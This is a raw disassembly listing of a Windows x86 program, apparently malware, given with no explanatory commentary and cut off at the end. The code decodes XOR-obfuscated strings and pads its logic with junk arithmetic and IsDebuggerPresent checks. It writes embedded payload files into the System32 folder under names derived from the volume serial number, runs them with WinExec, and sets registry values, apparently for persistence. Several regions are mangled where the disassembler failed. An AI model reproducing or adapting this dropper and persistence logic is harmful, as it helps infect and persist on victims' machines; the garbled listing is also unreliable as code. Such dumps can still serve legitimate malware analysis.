lea esi, aR6 ; "R6"
mov ecx, 3
rep movsb
call sub_40C574 ; GetProcessHeap
lea eax, [ebp+var_105]
push eax
push [ebp+arg_0]
call sub_403383
call sub_40C598 ; GetTickCount
push 2
push offset word_446666
call sub_4032E7
push eax
lea edi, [ebp+var_105]
push edi
call sub_40CA54
add esp, 18h
mov [ebp+var_108], 1D40h
add [ebp+var_108], 6FD4h
loc_403545: ; CODE XREF: sub_4034D8+9E�j
lea eax, [ebp+var_105]
push eax
call sub_40C5EC ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_10A], di
cmp [ebp+var_10A], 0
jz short loc_403578
movzx eax, [ebp+var_10A]
push eax
call sub_40C5E0 ; GlobalDeleteAtom
call sub_40C598 ; GetTickCount
jmp short loc_403545
; ---------------------------------------------------------------------------
loc_403578: ; CODE XREF: sub_4034D8+8A�j
pop edi
pop esi
leave
retn
sub_4034D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40357C proc near ; CODE XREF: sub_403610+A1�p
; sub_4036F2+37�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 1D8h
push esi
push [ebp+arg_0]
mov eax, dword_43C17C
lea eax, ds:40E110h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4035C1
; ---------------------------------------------------------------------------
loc_4035AA: ; CODE XREF: sub_40357C+47�j
mov eax, dword_43C17C
add eax, edi
lea eax, ds:40E110h[eax]
movsx edx, byte ptr [eax]
xor edx, 4Eh
mov [eax], dl
inc edi
loc_4035C1: ; CODE XREF: sub_40357C+2C�j
cmp edi, esi
jl short loc_4035AA
mov [ebp+var_8], 1C3h
mov eax, dword_43C17C
add eax, esi
mov byte ptr ds:dword_40E110[eax], 0
mov edi, dword_43C17C
mov eax, edi
add eax, 2
add eax, esi
mov dword_43C17C, eax
inc dword_43C17C
cmp dword_43C17C, 0E02h
jle short loc_403606
and dword_43C17C, 0
loc_403606: ; CODE XREF: sub_40357C+81�j
lea eax, dword_40E110[edi]
pop edi
pop esi
leave
retn
sub_40357C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403610 proc near ; CODE XREF: sub_4036F2+44�p
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_38], 579Dh
add [ebp+var_38], 917h
mov ax, word_43C180
mov [ebp+var_3A], ax
mov esi, 2C6Bh
mov eax, esi
add eax, esi
mov esi, eax
mov eax, 0Dh
sub eax, dword_43C178
push eax
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_40C9A0
add esp, 0Ch
call sub_40C514 ; GetCurrentThreadId
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_403663: ; CODE XREF: sub_403610+58�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403663
mov ebx, eax
mov [ebp+var_2], bl
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_1], 0
jmp short loc_403690
; ---------------------------------------------------------------------------
loc_40367A: ; CODE XREF: sub_403610+8A�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_403690: ; CODE XREF: sub_403610+68�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_40367A
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_4036C4
; ---------------------------------------------------------------------------
loc_4036AA: ; CODE XREF: sub_403610+C5�j
push 1
push offset byte_446664
call sub_40357C
push eax
push edi
call sub_40CA54
add esp, 10h
add [ebp+var_3], 1
loc_4036C4: ; CODE XREF: sub_403610+98�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_4036AA
call sub_40C5A4 ; GetVersion
push [ebp+arg_8]
push edi
call sub_40CA54
add esp, 8
call sub_40C538 ; RtlGetLastWin32Error
pop edi
pop esi
pop ebx
leave
retn
sub_403610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036F2 proc near ; CODE XREF: sub_40A766+671�p
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
lea edi, [ebp+var_35]
lea esi, word_43C182
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_2], 891h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push 1
push offset word_446662
call sub_40357C
push eax
lea edi, [ebp+var_34]
push edi
push [ebp+arg_0]
call sub_403610
add esp, 14h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_34]
push eax
call sub_40C5D4 ; GlobalAddAtomA
mov ebx, 3324h
sub ebx, 3885h
pop edi
pop esi
pop ebx
leave
retn
sub_4036F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40375C proc near ; CODE XREF: sub_4037EF+47�p
; .text:004038C7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 6Ch
push esi
push [ebp+arg_0]
mov eax, dword_43C18C
lea eax, ds:40F780h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4037A1
; ---------------------------------------------------------------------------
loc_40378A: ; CODE XREF: sub_40375C+47�j
mov eax, dword_43C18C
add eax, edi
lea eax, ds:40F780h[eax]
movsx edx, byte ptr [eax]
xor edx, 7
mov [eax], dl
inc edi
loc_4037A1: ; CODE XREF: sub_40375C+2C�j
cmp edi, esi
jl short loc_40378A
mov eax, dword_43C18C
add eax, esi
mov byte ptr ds:dword_40F780[eax], 0
xor edi, edi
mov edi, dword_43C18C
inc dword_43C18C
mov eax, dword_43C18C
lea eax, [eax+esi+6]
mov dword_43C18C, eax
cmp eax, 0DE8h
jle short loc_4037DE
and dword_43C18C, 0
loc_4037DE: ; CODE XREF: sub_40375C+79�j
mov [ebp+var_8], 0FFh
lea eax, dword_40F780[edi]
pop edi
pop esi
leave
retn
sub_40375C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037EF proc near ; CODE XREF: sub_40A766+719�p
; sub_40A766+74F�p
var_10A = word ptr -10Ah
var_108 = byte ptr -108h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
call sub_40C514 ; GetCurrentThreadId
lea edi, [ebp+var_108]
lea esi, byte_43C190
mov ecx, 3
rep movsb
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_40CA30
mov ax, word_43C193
mov [ebp+var_10A], ax
push 1
push offset asc_446660 ; "$"
call sub_40375C
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA54
mov ebx, 20A5h
sub ebx, 7EDBh
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_40CA54
add esp, 20h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_104]
push eax
call sub_40C5D4 ; GlobalAddAtomA
mov [ebp+var_105], 4Eh
add [ebp+var_105], 55h
pop edi
pop esi
pop ebx
leave
retn
sub_4037EF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10Ch
push esi
push edi
call sub_40C574 ; GetProcessHeap
lea edi, [ebp-10Bh]
lea esi, aH8me ; "H8mE"
mov ecx, 5
rep movsb
call sub_40C598 ; GetTickCount
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_40CA30
push 1
push offset asc_446660 ; "$"
call sub_40375C
push eax
lea edi, [ebp-104h]
push edi
call sub_40CA54
call sub_40C634 ; IsDebuggerPresent
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_40CA54
add esp, 20h
call sub_40C5A4 ; GetVersion
loc_4038F5: ; CODE XREF: .text:00403930�j
lea eax, [ebp-104h]
push eax
call sub_40C5EC ; GlobalFindAtomA
mov edi, eax
mov [ebp-106h], di
call sub_40C514 ; GetCurrentThreadId
cmp word ptr [ebp-106h], 0
jz short loc_403932
call sub_40C508 ; GetCurrentProcessId
movzx eax, word ptr [ebp-106h]
push eax
call sub_40C5E0 ; GlobalDeleteAtom
call sub_40C514 ; GetCurrentThreadId
jmp short loc_4038F5
; ---------------------------------------------------------------------------
loc_403932: ; CODE XREF: .text:00403917�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403936 proc near ; CODE XREF: sub_4039D6+8B�p
; sub_403AA3+73�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 20Eh
push esi
push [ebp+arg_0]
mov eax, dword_43C1A4
lea eax, ds:41DA90h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_8], 331h
xor edi, edi
jmp short loc_403985
; ---------------------------------------------------------------------------
loc_40396B: ; CODE XREF: sub_403936+51�j
mov eax, dword_43C1A4
add eax, edi
lea eax, ds:41DA90h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Fh
mov [eax], dl
inc edi
loc_403985: ; CODE XREF: sub_403936+33�j
cmp edi, esi
jl short loc_40396B
mov eax, dword_43C1A4
add eax, esi
mov byte ptr ds:dword_41DA90[eax], 0
mov edi, dword_43C1A4
inc dword_43C1A4
mov eax, dword_43C1A4
lea eax, [eax+esi+6]
mov dword_43C1A4, eax
add dword_43C1A4, 2
cmp dword_43C1A4, 0DFDh
jle short loc_4039CC
and dword_43C1A4, 0
loc_4039CC: ; CODE XREF: sub_403936+8D�j
lea eax, dword_41DA90[edi]
pop edi
pop esi
leave
retn
sub_403936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039D6 proc near ; CODE XREF: sub_403AA3+49�p
; sub_403C5F+155�p ...
var_1013 = byte ptr -1013h
var_100B = byte ptr -100Bh
var_1008 = dword ptr -1008h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1014h
call sub_40C498
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_100B]
lea esi, word_4411CA
mov ecx, 3
rep movsb
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1008]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_40C5BC ; GetVolumeInformationA
lea edi, [ebp+var_1013]
lea esi, aK0iJ ; " K0i=J "
movsd
movsd
push 4
push offset aK ; "Ŗæ·×"
call sub_403936
push [ebp+var_1008]
push eax
push ebx
call sub_40CA30
add esp, 14h
and [ebp+var_4], 0
loc_403A7A: ; CODE XREF: sub_4039D6+C1�j
mov eax, [ebp+var_4]
mov al, [ebx+eax]
cmp al, 41h
jge short loc_403A90
cmp al, 30h
jle short loc_403A90
mov eax, [ebp+var_4]
add eax, ebx
add byte ptr [eax], 11h
loc_403A90: ; CODE XREF: sub_4039D6+AC�j
; sub_4039D6+B0�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_403A7A
call sub_40C5A4 ; GetVersion
pop edi
pop esi
pop ebx
leave
retn
sub_4039D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AA3 proc near ; CODE XREF: sub_40A766+7E8�p
var_290 = dword ptr -290h
var_28A = byte ptr -28Ah
var_283 = byte ptr -283h
var_280 = byte ptr -280h
var_27C = dword ptr -27Ch
var_278 = byte ptr -278h
var_275 = byte ptr -275h
var_26F = byte ptr -26Fh
var_16B = byte ptr -16Bh
var_107 = byte ptr -107h
var_106 = word ptr -106h
var_104 = word ptr -104h
var_102 = word ptr -102h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 290h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_275]
lea esi, aKg7x_ ; "kg7x_"
mov ecx, 3
rep movsw
mov [ebp+var_104], 63FCh
movzx eax, [ebp+var_104]
imul eax, 3246h
mov [ebp+var_104], ax
lea eax, [ebp+var_16B]
push eax
call sub_4039D6
lea edi, [ebp+var_278]
lea esi, aOw ; "oW"
mov ecx, 3
rep movsb
mov eax, dword_4411DE
mov [ebp+var_27C], eax
push 9
push offset byte_446651
call sub_403936
lea edi, [ebp+var_16B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
mov ebx, 3DFBh
mov eax, 1040h
mul ebx
mov [ebp+var_290], eax
mov ebx, eax
lea eax, [ebp+var_FF]
push eax
call sub_403449
mov [ebp+var_102], 0F5Dh
movzx eax, [ebp+var_102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_102], ax
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_106], 10FCh
add [ebp+var_106], 4EDCh
push 0
lea eax, [ebp+var_280]
push eax
push 3621h
push offset byte_43DBA9
push ebx
call sub_40C730 ; WriteFile
push ebx
call sub_40C55C ; CloseHandle
mov ebx, 0CDFh
add ebx, 10D0h
lea edi, [ebp+var_283]
lea esi, word_4411E2
mov ecx, 3
rep movsb
push 104h
lea eax, [ebp+var_26F]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
push 1
push offset byte_44664F
call sub_403936
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
lea edi, [ebp+var_28A]
lea esi, aVR ; "|+V|;R"
mov ecx, 7
rep movsb
lea eax, [ebp+var_26F]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_40CA54
add esp, 38h
push 0
lea eax, [ebp+var_FF]
push eax
call sub_40C724 ; WinExec
mov [ebp+var_107], 0F3h
movzx eax, [ebp+var_107]
imul eax, 6754h
mov [ebp+var_107], al
pop edi
pop esi
pop ebx
leave
retn
sub_403AA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C5F proc near ; CODE XREF: sub_40A766+2E7�p
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_2FF = byte ptr -2FFh
var_2FC = byte ptr -2FCh
var_2F5 = byte ptr -2F5h
var_2F4 = byte ptr -2F4h
var_2F1 = byte ptr -2F1h
var_2E9 = byte ptr -2E9h
var_2E3 = byte ptr -2E3h
var_2DE = byte ptr -2DEh
var_278 = dword ptr -278h
var_271 = byte ptr -271h
var_270 = dword ptr -270h
var_26C = word ptr -26Ch
var_26A = byte ptr -26Ah
var_269 = byte ptr -269h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 328h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
lea edi, [ebp+var_2E3]
lea esi, aN4U ; "N4/u"
mov ecx, 5
rep movsb
mov [ebp+var_26A], 0C4h
movzx eax, [ebp+var_26A]
imul eax, 0CACh
mov [ebp+var_26A], al
push 26h
push offset dword_446628
call sub_403936
mov [ebp+var_304], eax
call sub_40CA18
mov [ebp+var_308], eax
call sub_40CA18
mov [ebp+var_30C], eax
call sub_40CA18
mov [ebp+var_310], eax
call sub_40CA18
mov [ebp+var_314], eax
call sub_40CA18
mov [ebp+var_318], eax
call sub_40CA18
mov [ebp+var_31C], eax
call sub_40CA18
mov [ebp+var_320], eax
call sub_40CA18
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_320]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_31C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_318]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_314]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
push edi
lea edi, [ebp+var_269]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_2E9]
lea esi, aVEM ; "v e~m"
mov ecx, 3
rep movsw
lea eax, [ebp+var_2DE]
push eax
call sub_4039D6
add esp, 34h
mov ebx, 3F4Bh
sub ebx, 721Bh
lea edi, [ebp+var_2F1]
lea esi, aKPyesn ; "k&PYESN"
mov ecx, 2
rep movsd
call sub_40CA18
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_101], dl
lea edi, [ebp+var_2F4]
lea esi, aAj ; "aJ"
mov ecx, 3
rep movsb
mov [ebp+var_1], 1
jmp short loc_403E4A
; ---------------------------------------------------------------------------
loc_403E1A: ; CODE XREF: sub_403C5F+1F0�j
call sub_40CA18
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_101], dl
add [ebp+var_1], 1
loc_403E4A: ; CODE XREF: sub_403C5F+1B9�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403E1A
mov [ebp+var_26C], 789Fh
movzx eax, [ebp+var_26C]
imul eax, 7E80h
mov [ebp+var_26C], ax
mov [ebp+var_F9], 0
call sub_40CA18
mov edx, eax
test dl, 1
jnz short loc_403EA8
call sub_40C574 ; GetProcessHeap
mov [ebp+var_FB], 33h
mov [ebp+var_324], 1F1Ah
add [ebp+var_324], 4A03h
mov [ebp+var_FA], 32h
loc_403EA8: ; CODE XREF: sub_403C5F+220�j
push 9
push offset word_44661E
call sub_403936
lea edi, [ebp+var_101]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_205]
push edi
call sub_40CA30
lea edi, [ebp+var_2F5]
lea esi, byte_441202
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_205]
push eax
call sub_403449
call sub_40C514 ; GetCurrentThreadId
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_270], 1D0Fh
inc [ebp+var_270]
push [ebp+arg_0]
mov eax, offset aMjanfj32 ; "Mjanfj32"
push eax
call sub_40CA30
push 0
lea eax, [ebp+var_2FC]
push eax
push 1A01h
push offset dword_43C1A8
push ebx
call sub_40C730 ; WriteFile
lea edi, [ebp+var_2FF]
lea esi, byte_441203
mov ecx, 3
rep movsb
push ebx
call sub_40C55C ; CloseHandle
call sub_40C634 ; IsDebuggerPresent
push 17h
push offset word_446606
call sub_403936
lea edi, [ebp+var_269]
push edi
push eax
lea edi, [ebp+var_101]
push edi
call sub_40CA30
mov [ebp+var_271], 81h
add [ebp+var_271], 1
lea eax, [ebp+var_205]
push eax
push offset byte_446605
lea eax, [ebp+var_101]
push eax
push 80000000h
call sub_40404B
mov [ebp+var_278], 2820h
mov eax, 260Ch
mul [ebp+var_278]
mov [ebp+var_324], eax
mov [ebp+var_278], eax
push 0Eh
push offset word_4465F6
call sub_403936
mov [ebp+var_328], eax
push 9
push offset dword_4465EC
call sub_403936
push eax
mov edi, [ebp+var_328]
push edi
lea edi, [ebp+var_101]
push edi
push 80000000h
call sub_40404B
call sub_40C598 ; GetTickCount
push 45h
push offset word_4465A6
loc_404010: ; DATA XREF: .data:0043E139�w
; .data:0043E153�w ...
call sub_403936
lea edi, [ebp+var_269]
push edi
sub_403C5F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40401C proc near ; DATA XREF: .data:0043E1CD�o
; .data:0043E21C�r
lea edi, [ebp-2DEh]
push edi
push eax
sub_40401C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404024 proc near ; DATA XREF: .data:0043E201�o
; .data:0043E216�r ...
push 80000002h
call sub_40404B ; DATA XREF: .data:loc_43E1A1�r
; .data:loc_43E1B1�r
add esp, 80h ; DATA XREF: .data:0043E0A5�w
loc_404034: ; DATA XREF: .data:0043E0AF�w
; .data:0043E0CA�r ...
mov word ptr [ebp-27Ah], 2967h
sub word ptr [ebp-27Ah], 716Eh
pop edi
pop esi
pop ebx
leave
retn
sub_404024 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40404B proc near ; CODE XREF: sub_403C5F+348�p
; sub_403C5F+3A0�p ...
var_17 = byte ptr -17h
var_F = byte ptr -0Fh
var_C = byte ptr -0Ch
var_6 = word ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_6], 396Fh
sub [ebp+var_6], 2933h
inc dword_43B228
lea edi, [ebp+var_F]
lea esi, word_441206
mov ecx, 3
rep movsb
lea edi, [ebp+var_17]
lea esi, aUs6arh ; " US6rH"
movsd
movsd
and [ebp+var_4], 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
loc_40408C: ; DATA XREF: .data:0043E054�w
push eax
push 0
push 0F003Fh ; DATA XREF: .data:0043E059�w
; .data:0043E075�w
loc_404094: ; DATA XREF: .data:0043E5B4�w
; .data:0043E5BA�r ...
push 0
push 0
sub_40404B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404098 proc near ; DATA XREF: .data:loc_43E4BD�o
; .data:0043E519�o ...
push 0
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40C91C ; RegCreateKeyExA
call sub_40C5A4 ; GetVersion
sub_404098 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4040AA proc near ; DATA XREF: sub_43E630+C�o
mov eax, [ebp+14h]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4040B2: ; CODE XREF: sub_4040AA+D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4040B2
mov [ebp-0Ch], eax ; DATA XREF: sub_43E630+1C�o
call sub_40C634 ; IsDebuggerPresent
push dword ptr [ebp-0Ch]
push dword ptr [ebp+14h]
push 1
push 0
push dword ptr [ebp+10h]
push dword ptr [ebp-4]
call sub_40C94C ; RegSetValueExA
call sub_40C574 ; GetProcessHeap
push dword ptr [ebp-4]
call sub_40C928 ; RegCloseKey
mov ebx, 4DD8h
mov eax, 4D1Ah
mul ebx
mov [ebp-1Ch], eax
mov eax, [ebp-1Ch]
mov ebx, eax
pop edi
pop esi
pop ebx
leave
retn
sub_4040AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040FC proc near ; CODE XREF: sub_404194+FE�p
; sub_404194+11E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_44121C
lea eax, ds:411DB0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404122: ; CODE XREF: sub_4040FC+42�j
mov eax, dword_44121C
add eax, edi
lea eax, ds:411DB0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ADh
mov [eax], dl
inc edi
loc_40413C: ; CODE XREF: sub_4040FC+24�j
cmp edi, esi
jl short loc_404122
mov [ebp+var_4], 1A7h
mov eax, dword_44121C
add eax, esi
mov byte ptr ds:dword_411DB0[eax], 0
mov edi, dword_44121C
add dword_44121C, 2
mov eax, dword_44121C
lea eax, [eax+esi+2]
mov dword_44121C, eax
inc dword_44121C
cmp dword_44121C, 0DB6h
jle short loc_40418A
and dword_44121C, 0
loc_40418A: ; CODE XREF: sub_4040FC+85�j
lea eax, dword_411DB0[edi]
pop edi
pop esi
leave
retn
sub_4040FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404194 proc near ; CODE XREF: sub_40A766+33D�p
var_14BA = byte ptr -14BAh
var_14B3 = byte ptr -14B3h
var_14B2 = byte ptr -14B2h
var_14AC = byte ptr -14ACh
var_14A7 = byte ptr -14A7h
var_14A4 = byte ptr -14A4h
var_149C = byte ptr -149Ch
var_1499 = byte ptr -1499h
var_1496 = byte ptr -1496h
var_1397 = byte ptr -1397h
var_1396 = byte ptr -1396h
var_1395 = byte ptr -1395h
var_1394 = dword ptr -1394h
var_1384 = dword ptr -1384h
var_1300 = byte ptr -1300h
var_1201 = byte ptr -1201h
var_1102 = word ptr -1102h
var_10FF = byte ptr -10FFh
var_10FE = byte ptr -10FEh
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 14BCh
call sub_40C498
push ebx
push esi
push edi
mov [ebp+var_10FF], 5Ah
movzx eax, [ebp+var_10FF]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_10FF], al
lea edi, [ebp+var_1499]
lea esi, byte_441220
mov ecx, 3
rep movsb
lea edi, [ebp+var_149C]
lea esi, byte_441223
mov ecx, 3
rep movsb
push 0FFh
lea eax, [ebp+var_1300]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
mov ebx, 2910h
inc ebx
mov [ebp+var_1394], 94h
mov [ebp+var_1102], 6834h
movzx eax, [ebp+var_1102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1102], ax
lea eax, [ebp+var_1394]
push eax
call sub_40C5B0 ; GetVersionExA
mov [ebp+var_1395], 0B9h
add [ebp+var_1395], 1
lea edi, [ebp+var_14A4]
lea esi, aNb_ya ; "%&nb.ya"
movsd
movsd
cmp [ebp+var_1384], 2
jnz loc_4042E9
mov [ebp+var_14B3], 0DCh
add [ebp+var_14B3], 90h
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C580 ; GetSystemDirectoryA
lea edi, [ebp+var_14BA]
lea esi, a@p ; " $~@p"
mov ecx, 7
rep movsb
push 0Fh
push offset word_446596
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1201]
push edi
call sub_40CA30
push 0Ah
push offset byte_44658B
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1496]
push edi
call sub_40CA30
push 8
push offset word_446582
call sub_4040FC
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
add esp, 38h
jmp short loc_404365
; ---------------------------------------------------------------------------
loc_4042E9: ; CODE XREF: sub_404194+BF�j
call sub_40C574 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C5C8 ; GetWindowsDirectoryA
call sub_40C598 ; GetTickCount
push 0Fh
push offset word_446572
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1201]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
push 0Eh
push offset byte_446563
call sub_4040FC
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1496]
push edi
call sub_40CA30
push 0Ch
push offset word_446556
call sub_4040FC
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CA54
add esp, 38h
loc_404365: ; CODE XREF: sub_404194+153�j
lea eax, [ebp+var_1496]
push eax
call sub_40C760 ; DeleteFileA
call sub_40C598 ; GetTickCount
lea edi, [ebp+var_14A7]
lea esi, aP ; " p"
mov ecx, 3
rep movsb
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_1201]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
lea edi, [ebp+var_14B2]
lea esi, aVk_0 ; " vK%;"
mov ecx, 3
rep movsw
push 39h
push offset aCAzaNiUAzaNNiN ; "ĮĀĀŻ §ķÉČĮŽĆŲĮ §ķÄĖČÕÄŽŁŽŹĀŁĀĮ"...
